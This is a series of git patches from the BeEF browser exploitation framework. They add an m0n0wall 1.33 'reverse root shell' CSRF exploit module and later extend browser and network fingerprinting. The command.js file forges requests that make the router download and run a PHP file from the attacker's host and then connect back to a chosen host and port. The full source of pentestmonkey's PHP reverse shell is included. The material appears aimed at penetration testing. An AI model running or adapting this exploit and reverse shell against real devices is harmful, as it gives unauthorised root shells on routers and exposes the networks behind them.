new file mode 100644
index 000000000..d511905c1
--- /dev/null
+++ b/modules/exploits/m0n0wall/COPYING.GPL
@@ -0,0 +1,339 @@
+		    GNU GENERAL PUBLIC LICENSE
+		       Version 2, June 1991
+
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
+ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+			    Preamble
+
+  The licenses for most software are designed to take away your
+freedom to share and change it.  By contrast, the GNU General Public
+License is intended to guarantee your freedom to share and change free
+software--to make sure the software is free for all its users.  This
+General Public License applies to most of the Free Software
+Foundation's software and to any other program whose authors commit to
+using it.  (Some other Free Software Foundation software is covered by
+the GNU Lesser General Public License instead.)  You can apply it to
+your programs, too.
+
+  When we speak of free software, we are referring to freedom, not
+price.  Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+this service if you wish), that you receive source code or can get it
+if you want it, that you can change the software or use pieces of it
+in new free programs; and that you know you can do these things.
+
+  To protect your rights, we need to make restrictions that forbid
+anyone to deny you these rights or to ask you to surrender the rights.
+These restrictions translate to certain responsibilities for you if you
+distribute copies of the software, or if you modify it.
+
+  For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must give the recipients all the rights that
+you have.  You must make sure that they, too, receive or can get the
+source code.  And you must show them these terms so they know their
+rights.
+
+  We protect your rights with two steps: (1) copyright the software, and
+(2) offer you this license which gives you legal permission to copy,
+distribute and/or modify the software.
+
+  Also, for each author's protection and ours, we want to make certain
+that everyone understands that there is no warranty for this free
+software.  If the software is modified by someone else and passed on, we
+want its recipients to know that what they have is not the original, so
+that any problems introduced by others will not reflect on the original
+authors' reputations.
+
+  Finally, any free program is threatened constantly by software
+patents.  We wish to avoid the danger that redistributors of a free
+program will individually obtain patent licenses, in effect making the
+program proprietary.  To prevent this, we have made it clear that any
+patent must be licensed for everyone's free use or not licensed at all.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.
+
+		    GNU GENERAL PUBLIC LICENSE
+   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+  0. This License applies to any program or other work which contains
+a notice placed by the copyright holder saying it may be distributed
+under the terms of this General Public License.  The "Program", below,
+refers to any such program or work, and a "work based on the Program"
+means either the Program or any derivative work under copyright law:
+that is to say, a work containing the Program or a portion of it,
+either verbatim or with modifications and/or translated into another
+language.  (Hereinafter, translation is included without limitation in
+the term "modification".)  Each licensee is addressed as "you".
+
+Activities other than copying, distribution and modification are not
+covered by this License; they are outside its scope.  The act of
+running the Program is not restricted, and the output from the Program
+is covered only if its contents constitute a work based on the
+Program (independent of having been made by running the Program).
+Whether that is true depends on what the Program does.
+
+  1. You may copy and distribute verbatim copies of the Program's
+source code as you receive it, in any medium, provided that you
+conspicuously and appropriately publish on each copy an appropriate
+copyright notice and disclaimer of warranty; keep intact all the
+notices that refer to this License and to the absence of any warranty;
+and give any other recipients of the Program a copy of this License
+along with the Program.
+
+You may charge a fee for the physical act of transferring a copy, and
+you may at your option offer warranty protection in exchange for a fee.
+
+  2. You may modify your copy or copies of the Program or any portion
+of it, thus forming a work based on the Program, and copy and
+distribute such modifications or work under the terms of Section 1
+above, provided that you also meet all of these conditions:
+
+    a) You must cause the modified files to carry prominent notices
+    stating that you changed the files and the date of any change.
+
+    b) You must cause any work that you distribute or publish, that in
+    whole or in part contains or is derived from the Program or any
+    part thereof, to be licensed as a whole at no charge to all third
+    parties under the terms of this License.
+
+    c) If the modified program normally reads commands interactively
+    when run, you must cause it, when started running for such
+    interactive use in the most ordinary way, to print or display an
+    announcement including an appropriate copyright notice and a
+    notice that there is no warranty (or else, saying that you provide
+    a warranty) and that users may redistribute the program under
+    these conditions, and telling the user how to view a copy of this
+    License.  (Exception: if the Program itself is interactive but
+    does not normally print such an announcement, your work based on
+    the Program is not required to print an announcement.)
+
+These requirements apply to the modified work as a whole.  If
+identifiable sections of that work are not derived from the Program,
+and can be reasonably considered independent and separate works in
+themselves, then this License, and its terms, do not apply to those
+sections when you distribute them as separate works.  But when you
+distribute the same sections as part of a whole which is a work based
+on the Program, the distribution of the whole must be on the terms of
+this License, whose permissions for other licensees extend to the
+entire whole, and thus to each and every part regardless of who wrote it.
+
+Thus, it is not the intent of this section to claim rights or contest
+your rights to work written entirely by you; rather, the intent is to
+exercise the right to control the distribution of derivative or
+collective works based on the Program.
+
+In addition, mere aggregation of another work not based on the Program
+with the Program (or with a work based on the Program) on a volume of
+a storage or distribution medium does not bring the other work under
+the scope of this License.
+
+  3. You may copy and distribute the Program (or a work based on it,
+under Section 2) in object code or executable form under the terms of
+Sections 1 and 2 above provided that you also do one of the following:
+
+    a) Accompany it with the complete corresponding machine-readable
+    source code, which must be distributed under the terms of Sections
+    1 and 2 above on a medium customarily used for software interchange; or,
+
+    b) Accompany it with a written offer, valid for at least three
+    years, to give any third party, for a charge no more than your
+    cost of physically performing source distribution, a complete
+    machine-readable copy of the corresponding source code, to be
+    distributed under the terms of Sections 1 and 2 above on a medium
+    customarily used for software interchange; or,
+
+    c) Accompany it with the information you received as to the offer
+    to distribute corresponding source code.  (This alternative is
+    allowed only for noncommercial distribution and only if you
+    received the program in object code or executable form with such
+    an offer, in accord with Subsection b above.)
+
+The source code for a work means the preferred form of the work for
+making modifications to it.  For an executable work, complete source
+code means all the source code for all modules it contains, plus any
+associated interface definition files, plus the scripts used to
+control compilation and installation of the executable.  However, as a
+special exception, the source code distributed need not include
+anything that is normally distributed (in either source or binary
+form) with the major components (compiler, kernel, and so on) of the
+operating system on which the executable runs, unless that component
+itself accompanies the executable.
+
+If distribution of executable or object code is made by offering
+access to copy from a designated place, then offering equivalent
+access to copy the source code from the same place counts as
+distribution of the source code, even though third parties are not
+compelled to copy the source along with the object code.
+
+  4. You may not copy, modify, sublicense, or distribute the Program
+except as expressly provided under this License.  Any attempt
+otherwise to copy, modify, sublicense or distribute the Program is
+void, and will automatically terminate your rights under this License.
+However, parties who have received copies, or rights, from you under
+this License will not have their licenses terminated so long as such
+parties remain in full compliance.
+
+  5. You are not required to accept this License, since you have not
+signed it.  However, nothing else grants you permission to modify or
+distribute the Program or its derivative works.  These actions are
+prohibited by law if you do not accept this License.  Therefore, by
+modifying or distributing the Program (or any work based on the
+Program), you indicate your acceptance of this License to do so, and
+all its terms and conditions for copying, distributing or modifying
+the Program or works based on it.
+
+  6. Each time you redistribute the Program (or any work based on the
+Program), the recipient automatically receives a license from the
+original licensor to copy, distribute or modify the Program subject to
+these terms and conditions.  You may not impose any further
+restrictions on the recipients' exercise of the rights granted herein.
+You are not responsible for enforcing compliance by third parties to
+this License.
+
+  7. If, as a consequence of a court judgment or allegation of patent
+infringement or for any other reason (not limited to patent issues),
+conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot
+distribute so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you
+may not distribute the Program at all.  For example, if a patent
+license would not permit royalty-free redistribution of the Program by
+all those who receive copies directly or indirectly through you, then
+the only way you could satisfy both it and this License would be to
+refrain entirely from distribution of the Program.
+
+If any portion of this section is held invalid or unenforceable under
+any particular circumstance, the balance of the section is intended to
+apply and the section as a whole is intended to apply in other
+circumstances.
+
+It is not the purpose of this section to induce you to infringe any
+patents or other property right claims or to contest validity of any
+such claims; this section has the sole purpose of protecting the
+integrity of the free software distribution system, which is
+implemented by public license practices.  Many people have made
+generous contributions to the wide range of software distributed
+through that system in reliance on consistent application of that
+system; it is up to the author/donor to decide if he or she is willing
+to distribute software through any other system and a licensee cannot
+impose that choice.
+
+This section is intended to make thoroughly clear what is believed to
+be a consequence of the rest of this License.
+
+  8. If the distribution and/or use of the Program is restricted in
+certain countries either by patents or by copyrighted interfaces, the
+original copyright holder who places the Program under this License
+may add an explicit geographical distribution limitation excluding
+those countries, so that distribution is permitted only in or among
+countries not thus excluded.  In such case, this License incorporates
+the limitation as if written in the body of this License.
+
+  9. The Free Software Foundation may publish revised and/or new versions
+of the General Public License from time to time.  Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+Each version is given a distinguishing version number.  If the Program
+specifies a version number of this License which applies to it and "any
+later version", you have the option of following the terms and conditions
+either of that version or of any later version published by the Free
+Software Foundation.  If the Program does not specify a version number of
+this License, you may choose any version ever published by the Free Software
+Foundation.
+
+  10. If you wish to incorporate parts of the Program into other free
+programs whose distribution conditions are different, write to the author
+to ask for permission.  For software which is copyrighted by the Free
+Software Foundation, write to the Free Software Foundation; we sometimes
+make exceptions for this.  Our decision will be guided by the two goals
+of preserving the free status of all derivatives of our free software and
+of promoting the sharing and reuse of software generally.
+
+			    NO WARRANTY
+
+  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
+FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
+OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
+PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
+OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
+TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
+PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
+REPAIR OR CORRECTION.
+
+  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
+REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
+INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
+OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
+TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
+YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
+PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGES.
+
+		     END OF TERMS AND CONDITIONS
+
+	    How to Apply These Terms to Your New Programs
+
+  If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+  To do so, attach the following notices to the program.  It is safest
+to attach them to the start of each source file to most effectively
+convey the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+    <one line to give the program's name and a brief idea of what it does.>
+    Copyright (C) <year>  <name of author>
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License along
+    with this program; if not, write to the Free Software Foundation, Inc.,
+    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+
+Also add information on how to contact you by electronic and paper mail.
+
+If the program is interactive, make it output a short notice like this
+when it starts in an interactive mode:
+
+    Gnomovision version 69, Copyright (C) year name of author
+    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
+    This is free software, and you are welcome to redistribute it
+    under certain conditions; type `show c' for details.
+
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License.  Of course, the commands you use may
+be called something other than `show w' and `show c'; they could even be
+mouse-clicks or menu items--whatever suits your program.
+
+You should also get your employer (if you work as a programmer) or your
+school, if any, to sign a "copyright disclaimer" for the program, if
+necessary.  Here is a sample; alter the names:
+
+  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
+  `Gnomovision' (which makes passes at compilers) written by James Hacker.
+
+  <signature of Ty Coon>, 1 April 1989
+  Ty Coon, President of Vice
+
+This General Public License does not permit incorporating your program into
+proprietary programs.  If your program is a subroutine library, you may
+consider it more useful to permit linking proprietary applications with the
+library.  If this is what you want to do, use the GNU Lesser General
+Public License instead of this License.
diff --git a/modules/exploits/m0n0wall/COPYING.PHP-REVERSE-SHELL b/modules/exploits/m0n0wall/COPYING.PHP-REVERSE-SHELL
new file mode 100644
index 000000000..35307c70a
--- /dev/null
+++ b/modules/exploits/m0n0wall/COPYING.PHP-REVERSE-SHELL
@@ -0,0 +1,6 @@
+This tool may be used for legal purposes only.  Users take full responsibility
+for any actions performed using this tool.  The author accepts no liability for
+damage caused by this tool.  If these terms are not acceptable to you, then do 
+not use this tool.
+
+In all other respects the GPL version 2 applies.
diff --git a/modules/exploits/m0n0wall/command.js b/modules/exploits/m0n0wall/command.js
new file mode 100644
index 000000000..9501a1237
--- /dev/null
+++ b/modules/exploits/m0n0wall/command.js
@@ -0,0 +1,34 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+
+  var uri = "http://" + rhost + ":" + rport + "/exec_raw.php?cmd=echo%20-e%20%22%23%21%2Fusr%2Flocal%2Fbin%2Fphp%5Cn%3C%3Fphp%20eval%28%27%3F%3E%20%27.file_get_contents%28%27http%3A%2F%2F" + beef.net.host + ":" + beef.net.port + "%2Fphp-reverse-shell.php%27%29.%27%3C%3Fphp%20%27%29%3B%20%3F%3E%22%20%3E%20x.php%3Bcat%20x.php%3Bchmod%20755%20x.php%3B";
+  
+  beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
+    if(response.status_code == 200){
+      function triggerReverseConn(){
+        beef.net.forge_request("http", "GET", rhost, rport, "/x.php?ip=" + lhost + "&port=" + lport, null, null, null, 10, 'script', true, null,function(response){
+          if(response.status_code == 200){
+            beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse shell should have been triggered.");
+          }else{
+            beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: second GET request failed.");
+          }
+        });
+      }
+      setTimeout(triggerReverseConn,5000);
+    }else{
+      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: first GET request failed.");
+    }
+  });
+    
+
+});
+
diff --git a/modules/exploits/m0n0wall/config.yaml b/modules/exploits/m0n0wall/config.yaml
new file mode 100644
index 000000000..d821ad28d
--- /dev/null
+++ b/modules/exploits/m0n0wall/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        monowall_reverse_root_shell_csrf:
+            enable: true
+            category: "Exploits"
+            name: "m0n0wall Reverse Root Shell CSRF"
+            description: "Attempts to get a reverse root shell on a m0n0wall 1.33<br />Vulnerablity found and PoC provided by Yann CAM @ Synetis.<br />For more information refer to <a href='http://www.exploit-db.com/exploits/23202/'>http://www.exploit-db.com/exploits/23202/</a><br />Patched in version 1.34.<br />This exploit make use of <a href='http://pentestmonkey.net/tools/web-shells/php-reverse-shell'>php-reverse-shell from Pentest Monkey</a>."
+            authors: ["bmantra"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/m0n0wall/module.rb b/modules/exploits/m0n0wall/module.rb
new file mode 100644
index 000000000..386f2b9c8
--- /dev/null
+++ b/modules/exploits/m0n0wall/module.rb
@@ -0,0 +1,28 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Monowall_reverse_root_shell_csrf < BeEF::Core::Command
+	def pre_send
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/m0n0wall/php-reverse-shell.php', '/php-reverse-shell', 'php')
+	end
+  
+	def self.options
+		configuration = BeEF::Core::Configuration.instance
+		lhost = "#{configuration.get("beef.http.host")}"
+		lhost = "" if lhost == "0.0.0.0"
+		return [
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost},
+			{ 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444'}
+		]
+	end
+
+	def post_execute
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('php-reverse-shell.php')
+		save({'result' => @datastore['result']})
+	end
+
+end
diff --git a/modules/exploits/m0n0wall/php-reverse-shell.php b/modules/exploits/m0n0wall/php-reverse-shell.php
new file mode 100644
index 000000000..e557dee63
--- /dev/null
+++ b/modules/exploits/m0n0wall/php-reverse-shell.php
@@ -0,0 +1,204 @@
+<?php
+// php-reverse-shell - A Reverse Shell implementation in PHP
+// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
+//
+// This tool may be used for legal purposes only.  Users take full responsibility
+// for any actions performed using this tool.  The author accepts no liability
+// for damage caused by this tool.  If these terms are not acceptable to you, then
+// do not use this tool.
+//
+// In all other respects the GPL version 2 applies:
+//
+// This program is free software; you can redistribute it and/or modify
+// it under the terms of the GNU General Public License version 2 as
+// published by the Free Software Foundation.
+//
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License along
+// with this program; if not, write to the Free Software Foundation, Inc.,
+// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+//
+// This tool may be used for legal purposes only.  Users take full responsibility
+// for any actions performed using this tool.  If these terms are not acceptable to
+// you, then do not use this tool.
+//
+// You are encouraged to send comments, improvements or suggestions to
+// me at pentestmonkey@pentestmonkey.net
+//
+// Description
+// -----------
+// This script will make an outbound TCP connection to a hardcoded IP and port.
+// The recipient will be given a shell running as the current user (apache normally).
+//
+// Limitations
+// -----------
+// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
+// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
+// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
+//
+// Usage
+// -----
+// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
+//
+// Modified version
+// ----------------
+// This file has been customized to pass ip address and port dynamically with permission of the original author
+// See http://beefproject.com
+
+set_time_limit (0);
+$VERSION = "1.0";
+$ip = $_GET["ip"];  //retrieve ip address to connect back to via HTTP GET
+if (!$ip) {
+    $ip = '127.0.0.1';  // or set static ip address
+}
+$port = $_GET["port"];  //retrieve port to connect back to via HTTP GET
+if (!$port) {
+    $port = 1234;  // or define port here
+}
+
+$chunk_size = 1400;
+$write_a = null;
+$error_a = null;
+$shell = 'uname -a; w; id; /bin/sh -i';
+$daemon = 0;
+$debug = 0;
+
+//
+// Daemonise ourself if possible to avoid zombies later
+//
+
+// pcntl_fork is hardly ever available, but will allow us to daemonise
+// our php process and avoid zombies.  Worth a try...
+if (function_exists('pcntl_fork')) {
+	// Fork and have the parent process exit
+	$pid = pcntl_fork();
+	
+	if ($pid == -1) {
+		printit("ERROR: Can't fork");
+		exit(1);
+	}
+	
+	if ($pid) {
+		exit(0);  // Parent exits
+	}
+
+	// Make the current process a session leader
+	// Will only succeed if we forked
+	if (posix_setsid() == -1) {
+		printit("Error: Can't setsid()");
+		exit(1);
+	}
+
+	$daemon = 1;
+} else {
+	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
+}
+
+// Change to a safe directory
+chdir("/");
+
+// Remove any umask we inherited
+umask(0);
+
+//
+// Do the reverse shell...
+//
+
+// Open reverse connection
+$sock = fsockopen($ip, $port, $errno, $errstr, 30);
+if (!$sock) {
+	printit("$errstr ($errno)");
+	exit(1);
+}
+
+// Spawn shell process
+$descriptorspec = array(
+   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
+   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
+   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
+);
+
+$process = proc_open($shell, $descriptorspec, $pipes);
+
+if (!is_resource($process)) {
+	printit("ERROR: Can't spawn shell");
+	exit(1);
+}
+
+// Set everything to non-blocking
+// Reason: Occsionally reads will block, even though stream_select tells us they won't
+stream_set_blocking($pipes[0], 0);
+stream_set_blocking($pipes[1], 0);
+stream_set_blocking($pipes[2], 0);
+stream_set_blocking($sock, 0);
+
+printit("Successfully opened reverse shell to $ip:$port");
+
+while (1) {
+	// Check for end of TCP connection
+	if (feof($sock)) {
+		printit("ERROR: Shell connection terminated");
+		break;
+	}
+
+	// Check for end of STDOUT
+	if (feof($pipes[1])) {
+		printit("ERROR: Shell process terminated");
+		break;
+	}
+
+	// Wait until a command is end down $sock, or some
+	// command output is available on STDOUT or STDERR
+	$read_a = array($sock, $pipes[1], $pipes[2]);
+	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
+
+	// If we can read from the TCP socket, send
+	// data to process's STDIN
+	if (in_array($sock, $read_a)) {
+		if ($debug) printit("SOCK READ");
+		$input = fread($sock, $chunk_size);
+		if ($debug) printit("SOCK: $input");
+		fwrite($pipes[0], $input);
+	}
+
+	// If we can read from the process's STDOUT
+	// send data down tcp connection
+	if (in_array($pipes[1], $read_a)) {
+		if ($debug) printit("STDOUT READ");
+		$input = fread($pipes[1], $chunk_size);
+		if ($debug) printit("STDOUT: $input");
+		fwrite($sock, $input);
+	}
+
+	// If we can read from the process's STDERR
+	// send data down tcp connection
+	if (in_array($pipes[2], $read_a)) {
+		if ($debug) printit("STDERR READ");
+		$input = fread($pipes[2], $chunk_size);
+		if ($debug) printit("STDERR: $input");
+		fwrite($sock, $input);
+	}
+}
+
+fclose($sock);
+fclose($pipes[0]);
+fclose($pipes[1]);
+fclose($pipes[2]);
+proc_close($process);
+
+// Like print, but does nothing if we've daemonised ourself
+// (I can't figure out how to redirect STDOUT like a proper daemon)
+function printit ($string) {
+	if (!$daemon) {
+		print "$string\n";
+	}
+}
+
+?> 
+
+
+

From 2484704fe8802b22a4faa6cba0425afdaad19073 Mon Sep 17 00:00:00 2001
From: bmantra <bart.leppens@gmail.com>
Date: Fri, 8 Mar 2013 21:00:52 +0100
Subject: [PATCH 230/397] add fingerprint for m0n0wall

---
 modules/network/internal_network_fingerprinting/command.js | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js
index ba9eb6301..620defb23 100644
--- a/modules/network/internal_network_fingerprinting/command.js
+++ b/modules/network/internal_network_fingerprinting/command.js
@@ -206,7 +206,11 @@ beef.execute(function() {
 	new Array(
 		"pfSense",
 		"443","https",false,
-		"/themes/pfsense_ng/images/logo.gif",200,56)
+		"/themes/pfsense_ng/images/logo.gif",200,56),
+	new Array(
+		"m0n0wall",
+		"80","http",false,
+		"/logo.gif",150,47)
 	);
 
 	// for each ip

From 657aac9dcd70c2dfb97c0b42fe4b1ddeb73c3b51 Mon Sep 17 00:00:00 2001
From: Javier Marcos <javier.marcos@gmail.com>
Date: Mon, 11 Mar 2013 00:19:19 +0000
Subject: [PATCH 231/397] Detection added for the Foxit Reader plugin, fixes
 #829

---
 core/main/client/browser.js                   | 40 +++++++++++++++++++
 core/main/handlers/browserdetails.rb          |  8 ++++
 .../admin_ui/controllers/modules/modules.rb   |  1 +
 .../admin_ui/controllers/panel/panel.rb       |  2 +
 .../media/javascript/ui/panel/ZombiesMgr.js   |  8 ++--
 extensions/console/lib/shellinterface.rb      |  1 +
 modules/browser/detect_foxit/command.js       | 14 +++++++
 modules/browser/detect_foxit/config.yaml      | 15 +++++++
 modules/browser/detect_foxit/module.rb        | 14 +++++++
 9 files changed, 100 insertions(+), 3 deletions(-)
 create mode 100644 modules/browser/detect_foxit/command.js
 create mode 100644 modules/browser/detect_foxit/config.yaml
 create mode 100644 modules/browser/detect_foxit/module.rb

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 3c064a593..10daa9cf4 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1223,6 +1223,15 @@ beef.browser = {
                         }
                         catch (e) {
                         }
+                    }},
+                'FoxitReader_Plugin':{
+                    'control':'FoxitReader Plugin',
+                    'return':function (control) {
+                        try {
+                            version = navigator.plugins['Foxit Reader Plugin for Mozilla']['version'];
+                            return 'FoxitReader Plugin Version ' + version;
+                        } catch (e) {
+                        }
                     }}
             };
 
@@ -1293,6 +1302,11 @@ beef.browser = {
                 'control':'WMPlayer.OCX',
                 'return':function (control) {
                     return 'Windows Media Player v' + parseFloat(control.versionInfo);
+                }},
+            'FoxitReaderPlugin':{
+                'control':'FoxitReader.FoxitReaderCtl.1',
+                'return':function (control) {
+                    return 'Foxit Reader Plugin v' + parseFloat(control.versionInfo);
                 }}
         };
         if (window.ActiveXObject) {
@@ -1388,6 +1402,7 @@ beef.browser = {
         var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
         var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
         var has_vlc = (beef.browser.hasVLC()) ? "Yes" : "No";
+        var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No";
         try{
             var cookies = document.cookie;
             var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
@@ -1432,6 +1447,7 @@ beef.browser = {
         if (has_quicktime) details['HasQuickTime'] = has_quicktime;
         if (has_realplayer) details['HasRealPlayer'] = has_realplayer;
         if (has_vlc) details['HasVLC'] = has_vlc ;
+        if (has_foxit) details['HasFoxit'] = has_foxit;
 
         return details;
     },
@@ -1548,6 +1564,30 @@ beef.browser = {
         if (!ggfactory) return false; else return true;
     },
 
+    /**
+     * Checks if the zombie has Foxit PDF reader plugin.
+     * @return: {Boolean} true or false.
+     *
+     * @example: if(beef.browser.hasFoxit()) { ... }
+     * */
+    hasFoxit:function () {
+
+        var foxitplugin = false;
+
+        try {
+            if (beef.browser.isIE()) {
+                var foxitControl = new ActiveXObject('FoxitReader.FoxitReaderCtl.1');
+                foxitplugin = true;
+            } else if (navigator.plugins['Foxit Reader Plugin for Mozilla']) {
+                foxitplugin = true;
+            }
+        } catch (e) {
+            foxitplugin = false;
+        }
+
+        return foxitplugin;
+    },
+
     /**
      * Dynamically changes the favicon: works in Firefox, Chrome and Opera
      **/
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index b390360c3..7469a2edd 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -239,6 +239,14 @@ module BeEF
             self.err_msg "Invalid value for HasGoogleGears returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasFoxit
+          has_foxit = get_param(@data['results'], 'HasFoxit')
+          if BeEF::Filters.is_valid_yes_no?(has_foxit)
+            BD.set(session_id, 'HasFoxit', has_foxit)
+          else
+            self.err_msg "Invalid value for HasFoxit returned from the hook browser's initial connection."
+          end
+
           # get and store the yes|no value for HasWebSocket
           has_web_socket = get_param(@data['results'], 'HasWebSocket')
           if BeEF::Filters.is_valid_yes_no?(has_web_socket)
diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index 9c563a603..327499b3e 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -84,6 +84,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
         ['Browser Components', 'QuickTime',          'HasQuickTime'],
         ['Browser Components', 'RealPlayer',         'HasRealPlayer'],
         ['Browser Components', 'VLC',                'HasVLC'],
+        ['Browser Components', 'Foxit Reader',       'HasFoxit'],
         ['Browser Components', 'ActiveX',            'HasActiveX'],
         ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
         ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb
index 541bfe284..bd06df3db 100644
--- a/extensions/admin_ui/controllers/panel/panel.rb
+++ b/extensions/admin_ui/controllers/panel/panel.rb
@@ -93,6 +93,7 @@ module BeEF
             has_quicktime   = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
             has_realplayer  = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasRealPlayer')
             has_vlc         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasVLC')
+            has_foxit       = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFoxit')
             date_stamp      = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
 
             return {
@@ -115,6 +116,7 @@ module BeEF
                 'has_silverlight' => has_silverlight,
                 'has_quicktime'   => has_quicktime,
                 'has_vlc'         => has_vlc,
+                'has_foxit'       => has_foxit,
                 'has_realplayer'  => has_realplayer,
                 'date_stamp'      => date_stamp
             }
